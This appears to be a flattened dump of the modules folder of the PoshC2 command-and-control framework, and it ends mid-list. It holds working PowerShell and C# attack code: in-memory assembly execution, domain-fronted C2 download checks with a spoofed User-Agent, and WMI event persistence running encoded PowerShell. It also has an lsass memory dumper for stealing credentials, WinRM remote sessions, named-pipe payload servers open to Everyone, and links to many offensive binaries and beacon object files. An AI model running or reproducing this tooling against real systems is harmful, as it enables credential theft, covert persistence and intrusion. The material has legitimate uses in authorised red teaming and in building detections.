[AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GetName().Name -eq $asmName } 21 | if ($asm -and $asm.EntryPoint) { 22 | echo "[+] Found Assembly" 23 | $asm.EntryPoint.Invoke($null, @(, $asmArgs)) 24 | } else { 25 | echo "[-] Assembly Not Found" 26 | } 27 | } finally { 28 | $sw.Flush() 29 | [Console]::SetOut($originalOut) 30 | } 31 | $output = $sw.ToString() 32 | $sw.Close() 33 | return $output 34 | } 35 | function List-Assemblies { 36 | [AppDomain]::CurrentDomain.GetAssemblies() | ForEach-Object { $_.FullName } 37 | } -------------------------------------------------------------------------------- /resources/modules/Invoke-SqlQuery.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | .Synopsis 3 | Invoke-SqlQuery 4 | .DESCRIPTION 5 | Invoke-SqlQuery 6 | .EXAMPLE 7 | Invoke-SqlQuery -Sqlserver 10.150.10.150 -Username sa -Password sa 8 | #> 9 | function Invoke-SqlQuery { 10 | 11 | param ( 12 | [String]$ConnectionString, 13 | [String]$Sqlserver, 14 | [String]$Username, 15 | [String]$Password, 16 | [String]$Catalog, 17 | [String]$Database, 18 | [String]$Query 19 | ) 20 | if (!$Database){ 21 | $Database = ";" 22 | } else { 23 | $Database = "$Database;" 24 | } 25 | 26 | if (!$Catalog){ 27 | $Catalog = "Initial Catalog=Master;" 28 | } else { 29 | $Catalog = "Initial Catalog=$Catalog;" 30 | } 31 | 32 | if ($Username -and $Password){ 33 | $Authentication = "User Id=$Username;Password=$Password;" 34 | } else { 35 | $Authentication = "Integrated Security=True;" 36 | } 37 | 38 | if (!$query){ 39 | $Query = 'SELECT @@version'; 40 | } 41 | 42 | $SqlConnection = New-Object System.Data.SqlClient.SqlConnection 43 | $SqlConnection.ConnectionString = "Data Source=$Sqlserver;$Catalog$Authentication$Database" 44 | $SqlCmd = New-Object System.Data.SqlClient.SqlCommand 45 | $SqlCmd.CommandText = $Query 46 | $SqlCmd.Connection = $SqlConnection 47 | $SqlAdapter = New-Object System.Data.SqlClient.SqlDataAdapter 48 | $SqlAdapter.SelectCommand = $SqlCmd 49 | $DataSet = New-Object System.Data.DataSet 50 | $SqlAdapter.Fill($DataSet) 51 | $DataSet.Tables[0] 52 | 53 | } 54 | -------------------------------------------------------------------------------- /resources/modules/Invoke-URLCheck.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-URLCheck { 2 | Param ( 3 | [Parameter(Mandatory = $true)] 4 | [array]$urls, 5 | [Parameter(Mandatory = $true)] 6 | [array]$domainfront, 7 | [Parameter(Mandatory = $true)] 8 | [string]$uri, 9 | [Parameter(Mandatory = $false)] 10 | [string]$proxyurl, 11 | [Parameter(Mandatory = $false)] 12 | [string]$username, 13 | [Parameter(Mandatory = $false)] 14 | [string]$password 15 | ) 16 | 17 | function Test-Webclient() { 18 | 19 | $username = "" 20 | $password = "" 21 | $proxyurl = "" 22 | 23 | $wc = New-Object System.Net.WebClient; 24 | 25 | if ($script:hostheader -and (($psversiontable.CLRVersion.Major -gt 2))) 26 | { 27 | $wc.Headers.Add("Host",$script:hostheader) 28 | } 29 | elseif($script:hostheader) 30 | { 31 | $script:srv="https://$($script:hostheader)$uri";$script:sconnect="https://$($script:hostheader)" 32 | } 33 | 34 | $wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko") 35 | $wc.Headers.Add("Referer",$script:sconnect) 36 | 37 | if ($proxyurl) 38 | { 39 | $wp = New-Object System.Net.WebProxy($proxyurl,$true); 40 | if ($username -and $password) 41 | { 42 | $PSS = ConvertTo-SecureString $password -AsPlainText -Force; 43 | $getcreds = new-object system.management.automation.PSCredential $username,$PSS; 44 | $wp.Credentials = $getcreds; 45 | } 46 | else 47 | { 48 | $wc.UseDefaultCredentials = $true; 49 | } 50 | $wc.Proxy = $wp; 51 | } 52 | else 53 | { 54 | $wc.UseDefaultCredentials = $true; 55 | $wc.Proxy.Credentials = $wc.Credentials; 56 | } 57 | $wc 58 | 59 | } 60 | 61 | function startprimer($url,$uri,$domainfront) 62 | { 63 | $script:srv=$url+$uri 64 | $script:sconnect=$url 65 | $script:hostheader=$domainfront 66 | (Test-Webclient).downloadstring($script:srv) 67 | } 68 | 69 | $uri = $uri+"?lang=1c400cee-081e-4898-977e-c984dcc1a8ba" 70 | 71 | foreach($url in $urls) 72 | { 73 | $index = [array]::IndexOf($urls, $url) 74 | try 75 | { 76 | startprimer $url $uri $domainfront[$index] 77 | } 78 | catch 79 | { 80 | write-output $error[0] 81 | } 82 | } 83 | 84 | } 85 | -------------------------------------------------------------------------------- /resources/modules/Invoke-WMIEvent.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | .Synopsis 3 | Invoke-WMIEvent 4 | https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows- 5 | Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless- 6 | Backdoor-wp.pdf 7 | 8 | .DESCRIPTION 9 | PS C:\> Usage: Invoke-WMIEvent -Name -Command -Hour -Minute 10 | .EXAMPLE 11 | PS C:\> Get-WMIEvent 12 | .EXAMPLE 13 | PS C:\> Invoke-WMIEvent -Name Backup -Command "powershell -enc abc" -Hour 10 -Minute 30 14 | .EXAMPLE 15 | PS C:\> Remove-WMIEvent -Name Backup 16 | #> 17 | Function Invoke-WMIEvent 18 | { 19 | 20 | Param 21 | ( 22 | [Parameter(Mandatory=$true)][string] 23 | $Name, 24 | [Parameter(Mandatory=$true)][string] 25 | $Command, 26 | [string] 27 | $Hour=9, 28 | [string] 29 | $Minute=30 30 | ) 31 | 32 | $Filter=Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{name="$Name";EventNameSpace='root\CimV2';QueryLanguage="WQL";Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = $Hour AND TargetInstance.Minute = $Minute GROUP WITHIN 60"}; 33 | 34 | $Consumer=Set-WmiInstance -Namespace "root\subscription" -Class 'CommandLineEventConsumer' -Arguments @{ name="$Name";CommandLineTemplate="$Command";RunInteractively='false'}; 35 | 36 | Set-WmiInstance -Namespace "root\subscription" -Class __FilterToConsumerBinding -Arguments @{Filter=$Filter;Consumer=$Consumer} 37 | 38 | Write-Output "" 39 | Write-Output "[+] WMIEvent added: $Name for $Hour : $Minute" 40 | Write-Output "[+] Command: $Command" 41 | Write-Output "" 42 | } 43 | 44 | Function Remove-WMIEvent 45 | { 46 | 47 | Param 48 | ( 49 | [Parameter(Mandatory=$true)][string] 50 | $Name 51 | ) 52 | 53 | Write-Output "" 54 | Write-Output "[*] Removing CommandLineEventConsumer" 55 | Get-WmiObject CommandLineEventConsumer -Namespace root\subscription -Filter "name='$Name'" | Remove-WmiObject 56 | Write-Output "[*] Removing __EventFilter" 57 | Get-WmiObject __EventFilter -Namespace "root\subscription" -Filter "name='$Name'" | Remove-WmiObject 58 | Write-Output "[*] Removing __FilterToConsumerBinding" 59 | Get-WmiObject __FilterToConsumerBinding -Namespace "root\subscription" | where-object -Property Consumer -like "*$NAME*" | Remove-WmiObject 60 | Write-Output "" 61 | Write-Output "[+] WMIEvent removed: $Name" 62 | Write-Output "" 63 | } 64 | Function Get-WMIEvent 65 | { 66 | gwmi CommandLineEventConsumer -Namespace root\subscription 67 | } 68 | -------------------------------------------------------------------------------- /resources/modules/Invoke-WinRMSession.ps1: -------------------------------------------------------------------------------- 1 | Function Get-RandomName 2 | { 3 | param ( 4 | [int]$Length 5 | ) 6 | $set = 'abcdefghijklmnopqrstuvwxyz'.ToCharArray() 7 | $result = '' 8 | for ($x = 0; $x -lt $Length; $x++) 9 | {$result += $set | Get-Random} 10 | return $result 11 | } 12 | Function Invoke-WinRMSession { 13 | param ( 14 | $username, 15 | $Password, 16 | $IPAddress 17 | ) 18 | $PSS = ConvertTo-SecureString $password -AsPlainText -Force 19 | $getcreds = new-object system.management.automation.PSCredential $username,$PSS 20 | 21 | $randomvar = (Get-RandomName 5) 22 | New-Variable -Name $randomvar -Scope Global -Value (New-PSSession -ComputerName $IPAddress -Credential $getcreds) 23 | $randomvar = "$"+"$randomvar" 24 | Return "`nSession opened, to run a command do the following:`nInvoke-Command -Session $randomvar -scriptblock {Get-Process} | out-string" 25 | 26 | } 27 | -------------------------------------------------------------------------------- /resources/modules/LockLess.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/LockLess.exe -------------------------------------------------------------------------------- /resources/modules/LoggedOnUsers.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/LoggedOnUsers.exe -------------------------------------------------------------------------------- /resources/modules/Logger.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/Logger.exe -------------------------------------------------------------------------------- /resources/modules/MiniDump.ps1: -------------------------------------------------------------------------------- 1 | 2 | Function MiniDump { 3 | $MiniDump = @" 4 | using System.Security.Principal; 5 | using System.Diagnostics; 6 | using System.IO; 7 | using System.Runtime.InteropServices; 8 | using System; 9 | 10 | public class MDump { 11 | 12 | [DllImport("dbghelp.dll", EntryPoint = "MiniDumpWriteDump", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode, ExactSpelling = true, SetLastError = true)] 13 | public static extern bool MiniDumpWriteDump(IntPtr hProcess, uint processId, SafeHandle hFile, uint dumpType, IntPtr expParam, IntPtr userStreamParam, IntPtr callbackParam); 14 | 15 | public static string Minidump(int pid = -1) 16 | { 17 | 18 | IntPtr targetProcessHandle = IntPtr.Zero; 19 | uint targetProcessId = 0; 20 | 21 | Process targetProcess = null; 22 | if (pid == -1) 23 | { 24 | Process[] processes = Process.GetProcessesByName("lsass"); 25 | targetProcess = processes[0]; 26 | } 27 | else 28 | { 29 | try 30 | { 31 | targetProcess = Process.GetProcessById(pid); 32 | } 33 | catch (Exception ex) 34 | { 35 | return String.Format("[X]Exception: {0}", ex.Message); 36 | } 37 | } 38 | 39 | try 40 | { 41 | targetProcessId = (uint)targetProcess.Id; 42 | targetProcessHandle = targetProcess.Handle; 43 | } 44 | catch (Exception ex) 45 | { 46 | return String.Format("[X] Error getting handle to {0} ({1}): {2}", targetProcess.ProcessName, targetProcess.Id, ex.Message); 47 | } 48 | bool bRet = false; 49 | 50 | string systemRoot = Environment.GetEnvironmentVariable("SystemRoot"); 51 | string dumpFile = String.Format("{0}\\Temp\\debug.bin", systemRoot); 52 | 53 | using (FileStream fs = new FileStream(dumpFile, FileMode.Create, FileAccess.ReadWrite, FileShare.Write)) 54 | { 55 | bRet = MiniDumpWriteDump(targetProcessHandle, targetProcessId, fs.SafeFileHandle, (uint)2, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero); 56 | } 57 | if (bRet) 58 | { 59 | return "[+] Dump successful - " + dumpFile; 60 | } 61 | else 62 | { 63 | return String.Format("[X] Dump failed: {0}", bRet); 64 | } 65 | } 66 | 67 | } 68 | "@ 69 | Add-Type $MiniDump 70 | $ptr = [MDump]::Minidump() 71 | echo $ptr 72 | } 73 | -------------------------------------------------------------------------------- /resources/modules/NamedPipe.ps1: -------------------------------------------------------------------------------- 1 | $scriptblock = 2 | { 3 | param ($Payload) 4 | $PipeName = "PoshMS" 5 | $p = [System.IO.Directory]::GetFiles("\\.\\pipe\\") 6 | $start = $true 7 | foreach ($i in $p) { 8 | if ($i -like "*PoshMS") { 9 | $start = $false 10 | } 11 | } 12 | while ($start) { 13 | add-Type -assembly "System.Core" 14 | $PipeSecurity = New-Object System.IO.Pipes.PipeSecurity 15 | $AccessRule = New-Object System.IO.Pipes.PipeAccessRule( "Everyone", "ReadWrite", "Allow" ) 16 | $PipeSecurity.AddAccessRule($AccessRule) 17 | $Pipe = New-Object System.IO.Pipes.NamedPipeServerStream($PipeName,"InOut",100, "Byte", "None", 1024, 1024, $PipeSecurity) 18 | $pipe.WaitForConnection(); 19 | 20 | $pipeReader = new-object System.IO.StreamReader($pipe) 21 | $pipeWriter = new-object System.IO.StreamWriter($pipe) 22 | $pipeWriter.AutoFlush = $true 23 | $pipeWriter.WriteLine($Payload); 24 | 25 | $pipeReader.Dispose(); 26 | $pipe.Dispose(); 27 | } 28 | exit 29 | } 30 | add-Type -assembly "System.Core" 31 | 32 | $MaxThreads = 5 33 | $RunspacePool = [RunspaceFactory]::CreateRunspacePool(1, $MaxThreads) 34 | $RunspacePool.Open() 35 | $Jobs = @() 36 | $Job = [powershell]::Create().AddScript($ScriptBlock).AddArgument($payload) 37 | $Job.RunspacePool = $RunspacePool 38 | $Job.BeginInvoke() | Out-Null 39 | 40 | $pi = new-object System.IO.Pipes.NamedPipeClientStream(".", "PoshMS"); 41 | 42 | 43 | -------------------------------------------------------------------------------- /resources/modules/NamedPipeDaisy.ps1: -------------------------------------------------------------------------------- 1 | $scriptblock = 2 | { 3 | param ($Payload) 4 | $PipeName = "PoshMSDaisy" 5 | $p = [System.IO.Directory]::GetFiles("\\.\\pipe\\") 6 | $start = $true 7 | foreach ($i in $p) { 8 | if ($i -like "*PoshMSDaisy") { 9 | $start = $false 10 | } 11 | } 12 | while ($start) { 13 | add-Type -assembly "System.Core" 14 | $PipeSecurity = New-Object System.IO.Pipes.PipeSecurity 15 | $AccessRule = New-Object System.IO.Pipes.PipeAccessRule( "Everyone", "ReadWrite", "Allow" ) 16 | $PipeSecurity.AddAccessRule($AccessRule) 17 | $Pipe = New-Object System.IO.Pipes.NamedPipeServerStream($PipeName,"InOut",100, "Byte", "None", 1024, 1024, $PipeSecurity) 18 | $pipe.WaitForConnection(); 19 | 20 | $pipeReader = new-object System.IO.StreamReader($pipe) 21 | $pipeWriter = new-object System.IO.StreamWriter($pipe) 22 | $pipeWriter.AutoFlush = $true 23 | $pipeWriter.WriteLine($Payload); 24 | 25 | $pipeReader.Dispose(); 26 | $pipe.Dispose(); 27 | } 28 | exit 29 | } 30 | add-Type -assembly "System.Core" 31 | 32 | $MaxThreads = 5 33 | $RunspacePool = [RunspaceFactory]::CreateRunspacePool(1, $MaxThreads) 34 | $RunspacePool.Open() 35 | $Jobs = @() 36 | $Job = [powershell]::Create().AddScript($ScriptBlock).AddArgument($daisypayload) 37 | $Job.RunspacePool = $RunspacePool 38 | $Job.BeginInvoke() | Out-Null 39 | 40 | $pi = new-object System.IO.Pipes.NamedPipeClientStream(".", "PoshMSDaisy"); 41 | 42 | 43 | -------------------------------------------------------------------------------- /resources/modules/NamedPipeProxy.ps1: -------------------------------------------------------------------------------- 1 | $scriptblock = 2 | { 3 | param ($Payload) 4 | $PipeName = "PoshMSProxy" 5 | $p = [System.IO.Directory]::GetFiles("\\.\\pipe\\") 6 | $start = $true 7 | foreach ($i in $p) { 8 | if ($i -like "*PoshMSProxy") { 9 | $start = $false 10 | } 11 | } 12 | while ($start) { 13 | add-Type -assembly "System.Core" 14 | $PipeSecurity = New-Object System.IO.Pipes.PipeSecurity 15 | $AccessRule = New-Object System.IO.Pipes.PipeAccessRule( "Everyone", "ReadWrite", "Allow" ) 16 | $PipeSecurity.AddAccessRule($AccessRule) 17 | $Pipe = New-Object System.IO.Pipes.NamedPipeServerStream($PipeName,"InOut",100, "Byte", "None", 1024, 1024, $PipeSecurity) 18 | $pipe.WaitForConnection(); 19 | 20 | $pipeReader = new-object System.IO.StreamReader($pipe) 21 | $pipeWriter = new-object System.IO.StreamWriter($pipe) 22 | $pipeWriter.AutoFlush = $true 23 | $pipeWriter.WriteLine($Payload); 24 | 25 | $pipeReader.Dispose(); 26 | $pipe.Dispose(); 27 | } 28 | exit 29 | } 30 | add-Type -assembly "System.Core" 31 | 32 | $MaxThreads = 5 33 | $RunspacePool = [RunspaceFactory]::CreateRunspacePool(1, $MaxThreads) 34 | $RunspacePool.Open() 35 | $Jobs = @() 36 | $Job = [powershell]::Create().AddScript($ScriptBlock).AddArgument($proxypayload) 37 | $Job.RunspacePool = $RunspacePool 38 | $Job.BeginInvoke() | Out-Null 39 | 40 | $pi = new-object System.IO.Pipes.NamedPipeClientStream(".", "PoshMSProxy"); 41 | 42 | 43 | -------------------------------------------------------------------------------- /resources/modules/Net-GPPPassword.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/Net-GPPPassword.exe -------------------------------------------------------------------------------- /resources/modules/OFs/adcs_enum.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/adcs_enum.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/adcs_enum.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/adcs_enum.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/adcs_enum_com.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/adcs_enum_com.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/adcs_enum_com.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/adcs_enum_com.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/adcs_enum_com2.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/adcs_enum_com2.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/adcs_enum_com2.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/adcs_enum_com2.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/adv_audit_policies.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/adv_audit_policies.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/adv_audit_policies.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/adv_audit_policies.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/arp.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/arp.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/arp.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/arp.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/cacls.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/cacls.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/cacls.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/cacls.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/demo_bof.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/demo_bof.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/demo_bof.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/demo_bof.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/dir.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/dir.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/dir.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/dir.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/driversigs.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/driversigs.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/driversigs.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/driversigs.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/enum_filter_driver.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/enum_filter_driver.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/enum_filter_driver.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/enum_filter_driver.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/enumlocalsessions.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/enumlocalsessions.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/enumlocalsessions.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/enumlocalsessions.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/env.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/env.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/env.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/env.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/findLoadedModule.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/findLoadedModule.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/findLoadedModule.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/findLoadedModule.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/get-netsession.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/get-netsession.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/get-netsession.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/get-netsession.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/get_password_policy.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/get_password_policy.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/get_password_policy.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/get_password_policy.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/inlineExecute-Assemblyx64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/inlineExecute-Assemblyx64.o -------------------------------------------------------------------------------- /resources/modules/OFs/ipconfig.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/ipconfig.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/ipconfig.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/ipconfig.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/ldapsearch.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/ldapsearch.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/ldapsearch.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/ldapsearch.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/listdns.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/listdns.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/listdns.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/listdns.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/listmods.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/listmods.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/listmods.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/listmods.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/locale.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/locale.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/locale.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/locale.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/netgroup.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/netgroup.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/netgroup.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/netgroup.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/netlocalgroup.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/netlocalgroup.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/netlocalgroup.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/netlocalgroup.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/netshares.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/netshares.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/netshares.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/netshares.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/netstat.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/netstat.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/netstat.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/netstat.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/netuse.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/netuse.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/netuse.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/netuse.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/netuser.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/netuser.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/netuser.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/netuser.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/netuserenum.x64.o: 